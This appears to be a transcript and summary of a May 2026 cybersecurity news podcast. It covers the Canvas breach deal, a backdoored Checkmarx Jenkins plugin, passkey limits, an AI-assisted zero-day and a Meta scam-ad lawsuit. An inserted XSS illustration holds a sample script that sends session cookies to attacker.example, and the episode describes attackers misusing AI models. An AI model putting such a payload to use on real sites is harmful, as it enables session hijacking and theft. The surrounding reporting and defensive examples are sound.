
Instructure cuts a deal with ShinyHunters, Checkmarx is hit again in another supply-chain attack, Microsoft and Google warn passkeys are not a security silver bullet, and Google reports its first evidence of hostile use of AI to develop a zero-day. This is Cybersecurity Today and I'm your host, David Shipley. Let's get started.

Instructure, the company behind the massively breached learning platform Canvas, has officially used the word agreement to describe its new arrangement with the criminal group ShinyHunters. In a statement on Tuesday, Instructure confirmed it has reached what it's calling an agreement with the threat actor responsible for the Canvas breach, which affects as many as 9,000 schools worldwide and as many as 275 million people, according to BleepingComputer. The company says ShinyHunters has returned the stolen data and provided what Instructure calls shred logs confirming its destruction. The agreement covers all impacted customers: the company says no one will need to negotiate separately and no individual customer will be extorted as a result of this incident.

It's worth noting that an agreement with a criminal organization is hardly a binding guarantee. At best, it's a talking point. ShinyHunters can keep a copy of the data, sell it tomorrow, or come back in six months under a different name, and no court, regulator or insurer can enforce anything against them. What the agreement actually is, most likely, is a line in Instructure's legal defense, one its lawyers will use in the civil suits that are probably already being drafted.

One useful new technical detail in BleepingComputer's reporting: the breach was enabled by multiple cross-site scripting (XSS) vulnerabilities in Canvas's user-generated content features. ShinyHunters injected malicious JavaScript that let them hijack authenticated administrative sessions and perform privileged actions inside the platform.
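To make the mechanism concrete: stored XSS in user-generated content boils down to a server emitting attacker-controlled markup verbatim, so a script planted by one user runs in another user's (here, an administrator's) authenticated browser session. The sketch below is a generic, deliberately defanged illustration in Python, not Canvas's actual code; the payload, URL and field names are invented.

```python
import html

def render_comment_unsafe(user_text: str) -> str:
    # Vulnerable pattern: user-generated content is dropped into the
    # page verbatim, so a <script> payload executes in the viewer's
    # authenticated session and can act with their privileges.
    return f"<div class='comment'>{user_text}</div>"

def render_comment_safe(user_text: str) -> str:
    # Mitigated pattern: escaping turns markup characters into inert
    # HTML entities before the content reaches the browser.
    return f"<div class='comment'>{html.escape(user_text)}</div>"

# Illustrative payload in the style of a session-stealing injection.
payload = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"

assert "<script>" in render_comment_unsafe(payload)    # payload survives intact
assert "<script>" not in render_comment_safe(payload)  # payload neutralized
```

Output encoding is only one layer; real platforms also rely on content security policies and HttpOnly session cookies, which is consistent with the layered-defense theme later in this episode.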
It was the same vulnerability class behind both the April 29 data theft and the May 7 defacement. Instructure is hosting a webinar today to share more about what it has done to secure the platform going forward. The longer-term question now is what message this move sends to the next ShinyHunters affiliate or similar gang looking to attack the next edtech platform. And that sign likely reads something like open season. As we noted on Monday, ShinyHunters is a young, opportunistic group. They watch what works, and what worked here was breach the platform, deface the login pages, make the threat public, and walk away with a deal.

Criminal hackers are mocking software security firm Checkmarx after breaching the company for the third time in seven weeks, according to BleepingComputer. A malicious version of Checkmarx's Jenkins application security testing (AST) plugin was published to the Jenkins marketplace on Saturday, May 9. Jenkins is one of the world's most widely deployed automation platforms in software engineering: it builds, tests and deploys code across an enormous portion of the world's software supply chain. The Checkmarx AST plugin sits inside that pipeline, scanning code for vulnerabilities as it's built. That plugin was itself backdoored to deliver credential-stealing malware. The group behind the breach calls itself Team PCP, and we've been talking about them a lot this year. The same group also claimed responsibility for the Shai-Hulud campaign on the npm package registry and the massive Trivy vulnerability scanner breach back in March. And it looks like the Trivy breach explains this latest one: a Checkmarx spokesperson confirmed to BleepingComputer that Team PCP got into the company's GitHub repository using credentials stolen during the Trivy attack.
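Credentials stolen in March still working in May is exactly what a rotation audit is meant to catch. A minimal sketch, assuming a simple inventory of secrets with issue dates and a 30-day rotation window; both the records and the window are illustrative, not Checkmarx's actual policy:

```python
from datetime import date, timedelta

def stale_secrets(inventory: dict, today: date, max_age_days: int = 30) -> list:
    """Return names of secrets issued more than max_age_days ago.

    Any secret on this list would still be valid weeks after a breach,
    which is the window exploited between these incidents.
    """
    cutoff = today - timedelta(days=max_age_days)
    return [name for name, issued in inventory.items() if issued < cutoff]

# Illustrative inventory: a repository token issued in March is still
# live in mid-May, i.e. roughly two months without rotation.
inventory = {
    "github-deploy-token": date(2026, 3, 20),
    "jenkins-api-token": date(2026, 5, 1),
}

print(stale_secrets(inventory, today=date(2026, 5, 13)))  # ['github-deploy-token']
```

A scheduled job that fails the build when this list is non-empty turns rotation from a policy document into an enforced control.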
They used that access to publish malicious versions of Checkmarx's KICS analysis tool to Docker, OpenVSX and VS Code in April, and now in May they've published a rogue version of the Jenkins plugin using the same approach. The attackers even left a taunt in the repository's about section, needling the company for not rotating its secrets properly. The malicious version carries a 2026.5.09 version label. If you've downloaded the Jenkins AST plugin from Checkmarx in the past week, assume your credentials are compromised: rotate everything and hunt for lateral movement. If credentials stolen from one vendor can be reused again to attack another vendor weeks later, the credential rotation gap across the security supply chain is clearly the soft target, and right now that gap is wide enough to drive three breaches through in less than two months.

Another cybersecurity silver bullet just bit the dust. This time it's passkeys, the so-called phishing-resistant authentication standard that was supposed to make passwords obsolete and put a serious dent in account takeover attacks. Google and Microsoft both issued new warnings this week that passkeys on their own are not the complete defense some in the industry have been promoting. Microsoft put the point plainly: each account is only as secure as its weakest credential, even on accounts where you've deployed passkeys. If any weaker credential or recovery method remains attached (a password, an SMS code, a security question), that weaker option is now the attack surface. Attackers will simply ignore the passkey and target the recovery flow instead, according to Forbes' coverage of the joint warning. Google's specific guidance is that even when you normally use a passkey, you still need two-step verification turned on. The reasoning is straightforward: someone can impersonate you, claim to have lost the passkey, and ride the account recovery process back into your account. The takeaway for individual users is clear.
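Microsoft's weakest-credential point can be expressed as a toy model: an account's effective resistance is the minimum across every sign-in and recovery path still attached, never the strength of the best one. The path names and 0-to-10 scores below are invented purely for illustration:

```python
def effective_strength(paths: dict) -> tuple:
    # Attackers pick the cheapest path in, so the account's effective
    # strength is min() over all attached paths, not max().
    weakest = min(paths, key=paths.get)
    return weakest, paths[weakest]

# Illustrative account: a strong passkey plus weaker fallbacks.
account = {
    "passkey": 9,
    "password": 3,
    "sms-recovery-code": 2,  # the recovery flow Google warns about
}

print(effective_strength(account))  # ('sms-recovery-code', 2)
```

Removing the weak paths, not adding another strong one, is what raises the minimum.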
Stop relying on SMS one-time codes as your second factor wherever you can. Both Google and Microsoft are pushing people towards the authenticator apps they each offer, and towards device-based confirmations, instead. On the enterprise side, Microsoft is recommending that high-assurance account recovery require a government-issued ID and a face scan, which is where NIST has been for a while. But here's the broader point worth taking from all this. Passkeys are good. They're meaningfully better than passwords, many of which people reuse. The pitch around them, though, has consistently overpromised that adoption alone would solve the credential problem. That was always going to break down in the corner cases, and the corner cases are where attackers live: corner cases like ease of use and multi-device functionality or, as noted by Google and Microsoft, the issues around account recovery. This is a recurring lesson for the entire cybersecurity field. There is no single technology that defends an account or an organization end to end on its own. There are no silver bullets. The best defense is always layered: strong technology paired with informed, motivated people, along with strong process and the assumption that every single control could and will likely fail on its own. It was never going to be one solution or the other, and it never will be.

For the first time, Google's Threat Intelligence Group, also known as GTIG, has confirmed a threat actor using a zero-day exploit they believe was developed with the help of AI. The vulnerability was a two-factor authentication bypass in a popular open-source server administration tool, and a criminal threat actor was preparing to use it in a mass exploitation event. GTIG's proactive research caught it first, and they worked with the vendor to responsibly disclose and patch the flaw before it could be deployed at scale. GTIG published the findings in a major update on Monday on how adversaries are using AI.
It's not about the evolution of hacking, it's about industrialization. The reason GTIG believes AI generated this exploit isn't a single smoking gun; it's the fingerprints. The Python script contained educational docstrings, a hallucinated CVSS score, and the kind of clean, structured, textbook Pythonic formatting that characterizes a lot of large language model output. More importantly, the vulnerability itself was a high-level semantic logic flaw, a hard-coded trust assumption that developers had left in the code. That's the type of bug that modern frontier LLMs are proving increasingly good at spotting through contextual reasoning, and that traditional security tools like fuzzers and static analysis don't see.

Google says state-sponsored hackers are industrializing their efforts with AI. GTIG observed actors associated with China and North Korea, including a group called APT45, sending thousands of repetitive prompts to recursively analyze CVEs and validate proofs of concept at a scale that would be impractical to manage manually. One PRC-aligned group is priming AI models with a knowledge base of 85,000 real-world vulnerability cases from a now-defunct Chinese bug bounty platform, effectively turning the model into a specialized vulnerability researcher.

On the malware side, the most striking discovery is a backdoor called PromptSpy. It's an Android malware family that uses the Gemini API to autonomously navigate the device's user interface: it serializes what's on screen, sends it to the model, gets back step-by-step click and swipe instructions, and executes them. It can also capture biometric authentication gestures and replay them if the user logs out. Google has disabled the assets associated with this threat actor. And here's a thread that ties back to the Checkmarx story earlier in the episode. The group Google tracks as UNC6780, better known publicly as Team PCP, was not just behind the Trivy and Checkmarx supply chain attacks.
GTIG confirms they also compromised LiteLLM and Barry AI, two open-source AI gateway tools that organizations use to integrate multiple LLM providers into their own applications. Cisco cited both LiteLLM and Trivy in its recent loss of source code. It's all the same playbook: Trojanized packages, malicious pull requests, credential stealers harvesting cloud secrets from build environments. The stolen credentials then get sold to extortion crews. GTIG also documented Russia-linked information operations using AI voice cloning to impersonate real journalists, Russia-aligned malware using LLM-generated junk code to evade detection, and a maturing underground ecosystem of middleware tools, proxy aggregators and anti-detection browsers giving threat actors anonymized, premium-tier access to commercial AI at scale. Two reports in the same week, the Dragos brief on Monday and this GTIG update, converge on a critical observation: AI is becoming a normal part of how attackers work. It's making average attackers more capable. It's making capable attackers faster.

The legal pressure on Meta over scam advertising just got bigger. According to Reuters, Santa Clara County in California has filed suit against Meta in a state superior court, alleging the company has profited from Facebook and Instagram ads promoting scams in violation of California's false advertising and unfair business practices laws. The county is suing on behalf of all California residents, citing leaked internal Meta documents first reported by Reuters last year. Santa Clara alleges Meta earned as much as $7 billion in annual revenue from what the company itself reportedly classifies as high-risk scam ads, ads that show clear signs of being fraudulent. The total haul Meta is alleged to have made in 2024 from likely scam ads? As much as $16 billion. The lawsuit further alleges Meta established internal guardrails to block scam-reduction efforts that would have cost the company too much money.
Meta says it intends to defend itself, calling the underlying Reuters reporting a distortion of its motives and pointing to the company's anti-scam efforts on and off the platform. This isn't the first action of its kind. We reported in April that the Consumer Federation of America filed suit against Meta in Washington, D.C., over the same issues, alleging violations of D.C. consumer protection law. Before that, the U.S. Virgin Islands Attorney General's office filed a separate suit which, among other things, alleges Meta charged advertisers higher rates to run ads flagged as likely to be fraudulent. As we noted in earlier coverage, scam ads have become a key part of the phishing funnel. And if you missed last Friday's special episode, we chatted with Erin West, a former prosecutor in Santa Clara County and the founder of the global anti-scam group Operation Shamrock. She had some important things to say about Meta's role in the scam epidemic.

That's Cybersecurity Today for Wednesday, May 13, 2026. We appreciate all of your feedback. Feel free to leave us a comment under the YouTube video, or drop by technewsday.com or .ca and send us a note. Thank you to everyone who has been leaving ratings and reviews on their favorite podcast platforms. Please keep it up; it really helps us reach more people, and it really makes our day. Jim Love will be back on the news desk on Friday. I'll be back on Monday with the latest headlines.
Episode: Canvas Breach 'Deal' With ShinyHunters, AI Zero-Day Warning, Checkmarx Hit Again
Host: David Shipley (guest host for Jim Love)
Date: May 13, 2026
Main Theme:
Critical developments in cybersecurity: the Canvas data breach and unprecedented “agreement” with ShinyHunters, repeated attacks on Checkmarx and the dangers of supply chain gaps, the limits of passkey security, evidence of AI-developed zero-day exploits, advanced AI-powered threat methodologies, and a new lawsuit against Meta for scam advertising.
[00:30–05:00]
"An agreement with a criminal organization is hardly a binding guarantee. At best it's a talking point." (02:03)
"ShinyHunters can keep a copy of the data, sell it tomorrow, or come back in six months... No court, regulator or insurer can enforce anything against them." (02:13)
"The longer-term question now is what message this move sends to the next ShinyHunters affiliate or similar gang looking to attack the next edtech platform. And that sign likely reads something like open season." (03:24)
[05:01–10:45]
"The attackers even left a taunt in the repository's about section, needling the company for not rotating its secrets properly." (09:12)
"If credentials stolen from one vendor can be reused again to attack another vendor weeks later, the credential rotation gap across the security supply chain is clearly the soft target, and right now that gap is wide enough to drive three breaches through in less than two months." (10:35)
[10:46–15:45]
"Each account is only as secure as its weakest credential, even on accounts where you’ve deployed passkeys." (11:51)
"Passkeys are good. They're meaningfully better than passwords... The pitch around them though has consistently overpromised that adoption alone would solve the credential problem... And the corner cases are where attackers live." (14:24)
"There are no silver bullets. The best defense is always layered strong technology paired with informed, motivated people along with strong process..." (15:00)
[15:46–20:55]
"The Python script contained educational doc strings, a hallucinated CVSS score, and the kind of clean structured textbook pythonic formatting that characterizes a lot of large language model output." (17:05)
"One PRC aligned group is priming AI models with a knowledge base of 85,000 real world vulnerability cases... effectively turning the model into a specialized vulnerability researcher." (19:15)
"It's all the same playbook: Trojanized packages, malicious pull requests, credential stealers harvesting cloud secrets from build environments." (21:30)
"AI is becoming a normal part of how attackers work. It’s making average attackers more capable. It’s making capable attackers faster." (23:15)
[20:56–23:45]
On 'deals' with hackers:
"An agreement with a criminal organization is hardly a binding guarantee. At best, it’s a talking point." (02:03) "...what worked here was breach the platform, deface the login pages, make the threat public, and walk away with a deal." (04:01)
On supply chain credential gaps:
"Credential rotation gap across the security supply chain is clearly the soft target, and right now that gap is wide enough to drive three breaches through in less than two months." (10:35)
On passkey hype:
"There are no silver bullets. The best defense is always layered strong technology paired with informed, motivated people along with strong process and the assumption that every single control could and will likely fail on its own." (15:00)
On AI’s threat capabilities:
"It's not about the evolution of hacking, it’s about industrialization." (17:13)
"AI is becoming a normal part of how attackers work... It’s making capable attackers faster." (23:15)
This episode paints a picture of modern cybersecurity: no single solution is sufficient, AI is rapidly industrializing cyberattacks, supply chains remain dangerously exposed, and legal and ethical boundaries are being repeatedly tested. The host’s tone is pragmatic and direct, framing each breach or technology trend as a lesson for both defenders and decision-makers.
Actionable Takeaways: